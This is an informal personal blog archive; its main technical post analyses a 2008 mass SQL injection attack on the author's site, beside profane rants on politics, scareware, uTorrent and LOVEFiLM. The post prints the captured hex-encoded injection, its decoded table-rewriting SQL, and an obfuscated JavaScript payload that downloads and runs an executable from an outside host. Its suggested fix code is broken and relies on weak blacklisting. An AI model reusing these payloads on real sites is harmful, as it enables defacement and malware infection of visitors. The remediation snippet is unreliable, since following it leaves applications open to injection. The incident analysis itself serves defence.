in.spite

Due to the lack of things to do at work (and the demise of FaceBook) I’ve been wasting more time on sites like Digg and LifeHacker et al.

Typically, I see a fun story and click it, read it and move on. The problem is, there are not that many fun stories out there, most of the stuff that is posted is utterly boring and cannot really be of genuine interest. These posts typically get 2000+ diggs, and upwards of 200 comments.

I want to write and tell the losers to stop commenting, to just stop writing mindless drivel, (stop posting it would be even better) but I’ld be cast as a troll. I just wonder who are these people that spend hours of their lives reading dumb posts, commenting on things which are utterly useless and pointless. It’s not even funny most of it. It’s just:

“Wow”

“Amazing”

“Linux rules”

“Windows sucks”

“Fuck you asshole”

“Nazi“

You get the drift.

Every so often, the fates conspire to bring us a contest, from which will be rise a champion whose influence will last decades, if not longer.  David v Goliath!  Kirk v the Klingons! Picard v the Borg! Janeway v the Borg! Luke v Vader, Luke v The Emperor. You get the drift.

The contest between Hillary and Obama, is not one of these.

Quite frankly, it is the most boring thing I’ve seen for a long bloody time. I thought American’s were stupid when they voted GWB the first time. The second time, are you fucking kidding me.

Now this. 

It’s the oldest trick in the book, divide and conquer; normally you get your opponents to do both bits, the division and the conquest; not this time. Obama (and Hillary) have done their utmost to split things right down the middle.

There is no way the Republicans can win this election.

If you’ld asked me before the Primaries started, I would have said that any loyal Democrat would do whatever it took to win the next election.  These two seem to be doing whatever they can to lose it.

What a damned shame.

I posted this when my website got hacked. Within hours thanks to several clever guys,  the whole thing was completely deconstructed with hard facts and code. Thanks to all those that contributed their information, it really helped me and many others out there.

This post is a summary of the comments spawned by my original post. If I forgot something important let me know.

Also check out:

• Internet Storm Center
• InfoWorld
• CSO Online
• The Register

How it was done

SQL injection through via unescaped querystring variables.

We think they looked and tried several query string variables (like id, by, filter, etc)

Here is the code they injected (gotten from someone’s logfiles, and slightly tidied)

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0×4400450043004C0041005200450020004000540020007
600610072006300680061007200280032003500350029002
C00400043002000760061007200630068006100720028003
20035003500290020004400450043004C004100520045002
0005400610062006C0065005F0043007500720073006F007
200200043005500520053004F005200200046004F0052002
000730065006C00650063007400200061002E006E0061006
D0065002C0062002E006E0061006D0065002000660072006
F006D0020007300790073006F0062006A006500630074007
300200061002C0073007900730063006F006C0075006D006
E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E0064002
00061002E00780074007900700065003D002700750027002
00061006E0064002000280062002E0078007400790070006
5003D003900390020006F007200200062002E00780074007
900700065003D003300350020006F007200200062002E007
80074007900700065003D0032003300310020006F0072002
00062002E00780074007900700065003D003100360037002
90020004F00500045004E0020005400610062006C0065005
F0043007500720073006F007200200046004500540043004
80020004E004500580054002000460052004F004D0020002
0005400610062006C0065005F0043007500720073006F007
200200049004E0054004F002000400054002C00400043002
0005700480049004C0045002800400040004600450054004
30048005F005300540041005400550053003D00300029002
00042004500470049004E002000650078006500630028002
70075007000640061007400650020005B0027002B0040005
4002B0027005D00200073006500740020005B0027002B004
00043002B0027005D003D0072007400720069006D0028006
3006F006E007600650072007400280076006100720063006
800610072002C005B0027002B00400043002B0027005D002
90029002B00270027003C007300630072006900700074002
0007300720063003D0068007400740070003A002F002F006
3002E007500630038003000310030002E0063006F006D002
F0030002E006A0073003E003C002F0073006300720069007
00074003E002700270027002900460045005400430048002
0004E004500580054002000460052004F004D00200020005
400610062006C0065005F0043007500720073006F0072002
00049004E0054004F002000400054002C004000430020004
5004E004400200043004C004F00530045002000540061006
2006C0065005F0043007500720073006F007200200044004
50041004C004C004F0043004100540045002000540061006
2006C0065005F0043007500720073006F007200%20AS%20
NVARCHAR(4000));
EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;
DECLARE_@S_NVARCHAR4000);
SET_@S=CAST0×4400450043004C004100520045002000400
054002000760061007200630068006100720028003200350
0350029002C00400043002000′.
202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248

The actual SQL injected looks like this (decoded this looks like

DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor
CURSOR FOR select a.name,b.name from
 sysobjects a,
 syscolumns b
 where
 a.id=b.id
 and a.xtype=’u’
 and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)OPEN Table_Cursor
 FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
  exec(’update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+””’)
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
DEALLOCATE Table_Cursor

How to find it exactly how it happened to you

Try this in the command prompt on your logfiles:
find "0x4400450043" ex071228.log
find “0×4400450043″ ex071229.log
find “0×4400450043″ ex071230.log

How to fix

Make sure you escape your variables to protect against SQL injection.

In this case (MS SQL Server), you should do (something like) this:

string safer_id = Request.QueryString["id"].Replace(”‘“,””“);

By the looks of it ‘CAST(‘ and ‘EXEC(‘ look like good things to disallow too. More than likely you should restrict the length of the querystrings too, so something like the below can’t really hurt.

string safer = Request.QueryString["id"].Replace(”‘“,””“);
if (safer .Length > 12 safer = safer.Substring(0,127);
safer = safer.Replace(”CAST(”,”NOCAST](”);
safer = safer.Replace(”‘EXEC(”,”NOEXEC](”);

These are not fool proof(*) and you should use STORED PROCEDURES in future (I know it is much more work!).

What did it do?

Basically the code injected into your database found every varchar and text field and appended the string:

<script src=http://?.uc8010.com/0.js></script>

The code for 0.js looks like:

function setCookie(name,value)
{
var Days = 1;var exp = new Date();
exp.setTime(exp.getTime() + Days*30*60*1000);
//Days*24*60*60*1000;
document.cookie = name + “=”+ escape(value) +”;expires=”+ exp.toGMTString();
}function getCookie(name)
{
var arr = document.cookie.match(new RegExp(”(^| )”+name+”=([^;]*)(;|$)”));
if(arr != null)
{
return unescape(arr[2]);
}
else
{
document.writeln(”");
document.writeln(”");
setCookie(”Lin”,”ok”);
return null;
}
}getCookie("Lin")eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\123\155\101\143\161\111\167\107\126\70\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\143\150\151\156\141\54\42\42\54\42\157\160\145\156\42\54\60\51\175\143\141\164\143\150\50\151\51\173\151\75\61\175\15\12\175\15\12\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\162\156\155\142\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73")

It is malicious: the point

According to websmithrob this code is malicious and hidden in there is an attack known as the EXPL_REALPLAY.H
or RealPlayer Exploit (read more about it here)

update on uc8010(dot)com: 07 January 2008

The exploit has been exposed and described (see the comments below; very, very informative). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.

Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here http://websmithrob.wordpress.com/ (or this http://isc.sans.org/diary.html?date=2008-01-04).

Also watch out for ucmal.com (122.224.146.246) which appears to be up to similiar tricks.

Original post
I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

A non-technical friend of mine recently phoned me up to say he had been infected by a virus.  His home page was hi-jacked and he was pretty worried. The infection was proudly proclaimed to be by asecurityservice.com.  According to several sources [of dubious accuracy]  this is very serious.

asecurityservice.com is dangerous toolbar and comes from very dangerous trojan zlob. It hijack your homepage and displays fake warning message to download the another fake spyware applications… If your computer is infected by asecurityservice.com.com hijacker then it is very dangerous for your computer.

from http://www.pcontech.com/

Note how many times they say dangerous. Note how poor the English is. Note how childishly they warn you of the impending doom. Ooooh this must be bad. I want my {mommy | blanket | cigarettes | pillow} (delete as appropriate)

What are the symptoms?

User’s homepage is changed to asecurityservice.com.com or to other unfamiliar websites. Warning messages such as “Virus Alert”, “Your Computer is Infected”, “Security Alert” Trojan-Spy.win32@mx or Spyware.Cyberlog-X infections are displayed.

You even get a warning that something has happened.

The art of deception: dead?

Well that’s all very interesting, but if I were seriously writing a trojan, would I shout so loudly that I had invaded your machine? (I saw Troy, and I don’t remember the Spartans (holding megaphones) riding the wooden horse into Troy , shouting YOUR DEFENSES HAVE BEEN BREACHED). In fact why bother with the wooden horse in the first place?Morons.

No. More likely this is what I think should be called “asshole-ware”. Why would someone announce that you were ill, could it be so that they could sell you medicine?

Your machine probably is infected, it may even be a real trojan, but the real catch, is they get you to pay $25 to remove the infection. Its a real real dumb idea, but it probably works.

A real trojan is about stealth, it doesn’t announce that it is dangerous.

It’s extremely funny, because they warn you of:

Very High Risk   -  Extremely dangerous Spyware. asecurityservice.com Uses stealth installation, randomly named entries and has the capability to self update or Restore after incomplete removal. Very hard to remove manually. Removing by free software or Re-Name the Dll file of asecurityservice.com cannot decrease the Privacy Risk, because it uses stealth installation method. 

I like anything which uses stealth and then warns me that it is using steatlth. Is the art of deception truly dead? Was the Cold War all for nothing? Fuckwits.

We have a cure

You can use http://www.lavasoftusa.com to clean your machine. Its free. Its safe. Its well-known. This is a reputable product, and you can download it from http://www.downloads.com. A safe place to get stuff like this.

If you gonna lie, make it big

Lies:

• http://answers.yahoo.com/question/index?qid=20070802173106AA3GHWD
• http://hubpages.com/hub/asecurityservice-com

The key to note is that the answer is always the same, and specific recommendation the some no-brand spyware tool. Surprising that they never suggest McAfee or Symantec etc.

Appendix of delusion

This site is probably linked to the idiot mastermind idiot of this scam: http://www.pcontech.com/ where they list their other scams.

 Latest Hijackers List  More lies:

• besecuredtoday.com
• Asecurityservice.com
• asafecenter.com
• awebsecurity.com
• thesafetynotes.com
• asecureinfo.com
• topiesecurity.com
• asafebrowser.com
• iesafetylist.com
• protectstand.com

Old Hijackers List Older lies:

• assuredguard.com
• securityiepage.com
• secureuptodate.com
• asecurityupdate.com
• asafehomepage.com
• aprotectservice.com
• asafetywarning.com
• asecurityview.com
• protectpage.com
• asafetylist.com
• asafetyproject.com
• asafetynotice.com
• asecuritypaper.com

I dunno what happened, but it seems to me that uTorrent 1.7.x is broken and is being banned by several trackers. There are several VERY long threads at http://forum.torrent.com/.

• TorrentsForAll.net Advises against utorrent 1.7+ 
• uTorrent banned on several trackers!
• 1.7.x slows down browsing on Windows XP
• My mini-crusade to get uTorrent 1.7.1 unbanned.

Even the wiki http://en.wikipedia.org/wiki/%CE%9CTorrent has an entry under the headline Major Bugs. For posterity it currently reads (I suspect this will get removed from the post very soon).

Major bugs
On July 21, 2007 µTorrent version 1.7.2 was released which fixed two bugs that had caused earlier 1.7 versions to be banned on a variety of trackers. The bugs in question could cause wrong stats to be reported both intentionally and unintentional. The first bug was solved in version 1.7.1 and the second in 1.7.2[16]. Although rumors spread that these µTorrent versions also reported personal info to a unknown destination (possibly the RIAA or MPAA) this has not been proven.

The solution is pretty obvious: http://download.utorrent.com/1.6.1/utorrent.exe

There is a bigger issue here, and it concerns the survival of P2P, will our own paranoia about the MPAA / RIAA  force P2P out of use. Are they spreading the rumors, if they are it is certainly the best weapon they have against P2P. If its just paranoia, well that’s pretty sad. uTorrent, is one of the finest pieces of freeware ever, as essential as WinZip ever was. So let’s not ruin a good thing.

Once every 5 or 10 years an idea so simple, so elegant, so obvious comes along and *SMACKS* you in the kisser. We call these ideas, good ones.  What I really want to talk about has nothing to with “getting it” or “making it”. Are you for real? What the hell did you think I was gonna tell you? The answer, you dumb-ass, is blowin’ in the wind. Bob D. wrote that like 40 years ago, he knew what you should know, but because you are so busy trying to make it, you forgot to think. Forgetting to think is probably the biggest problem around (the next biggest problem is witless assholes who think they have it all figured out). 

Anyway, that’s *slightly* off topic.

The biggest question today is not what you, or your Daily Mail | Express  neighbours think. They are irrelevant, the world is being re-shaped without their bullshit agenda. People are tired of lies, although their propensity to be lied to seems to rise with inflation.

Nirvana killed punk rock (by accident),  does that make them evil? We destroyed our planet (by accident)? Does that make us evil? Or stupid? Does it matter?

Answers on a postcard.

Don’t forget that of all the things that you are, you might best be judged by what you want to be (or do!). If I was a god, that’s how I’ld do it. It’s the intent that matters really, ultimately the truth of what and who you will are will surface. A wasted life would be one where it didn’t.

Remember “It’s the best years of your life they want to steal” (vide infra), so the quicker you listen to “the voices in your head” the better. The time is now, don’t wait till you have the BMW, the house, the knowledge. How much can that stuff really mean to you anyway.

It’s not about save the planet, it’s really about drowning out the other noises and voices which seek to steer you away from doing what it is you need to do.

The voices in your head are calling
Stop wasting your time, there’s nothing coming
Only a fool would think someone could save you
The men at the factory are old and cunning
You don’t owe nothing, so boy get runnin’
It’s the best years of your life they want to steal

Clampdown, The Clash (only a fool wouldn’t know that :) 

Who was the Time “Person of the Year” in 2006? You’ll never believe it, no, you wouldn’t believe it if I told you, it was you (this is for real, not a “joke”).

How quaint? “You control the Information Age. Welcome to your world.” Who the fuck writes shit like this. Who the fuck believes it. Many do. Writing about holidays in the sun and polka dot bikinis.

No one cares about what you have to say.

You must have realised, after writing over 4,458 posts, and amassing 350 comments and 580,876 views, and 7.5 million page impressions, after building your pathetic “brand online“, you are #1 with a bullet in Technorati, you earn £0.53 a day from Google Adwords. What a success story you are.

You have a Page Rank of 4!

Well done, but guess what. Nothing you do ONLINE will ever make a difference. Turn it off, if you want to be noticed, go have a crap in the middle of the street, that works (you’ld be about £0.53p a day worse off though).

Regular visitors (hi T and C) will know about the LOVEFiLM story, but just a little update on these ass-fucks.

Today I got a really chirpy email from LOVEFiLM trying to sell me more shit (I have, by now, of course cancelled my account).  It’s unsolicited email as far as I’m concerned, surely, when I cancelled my account, they should have stopped sending me emails?

Anyway, I know these guys are complete fuck-wanks. So, okay, I’ll unsubscribe…. ah ha here it is:

To unsubscribe from further LOVEFiLM promotions and offers,please email us at
desubscribe@lovefilm.com. You may also submit a written request via UK postal mail to: LOVEFiLM, Freepost NAT5978, London NW10 6BR. Upon receipt, unsubscriber requests will be processed within 10 business days.

No problemo, I’ll send them an email. Wait for it…..

The following recipient(s) could not be reached:
desubscribe@lovefilm.com on 30/05/2007 10:45

The e-mail account does not exist at the organization this message was sent to. 
Check the e-mail address, or contact the recipient directly to find out the correct address.

These guys really, really, really are funny fuckers.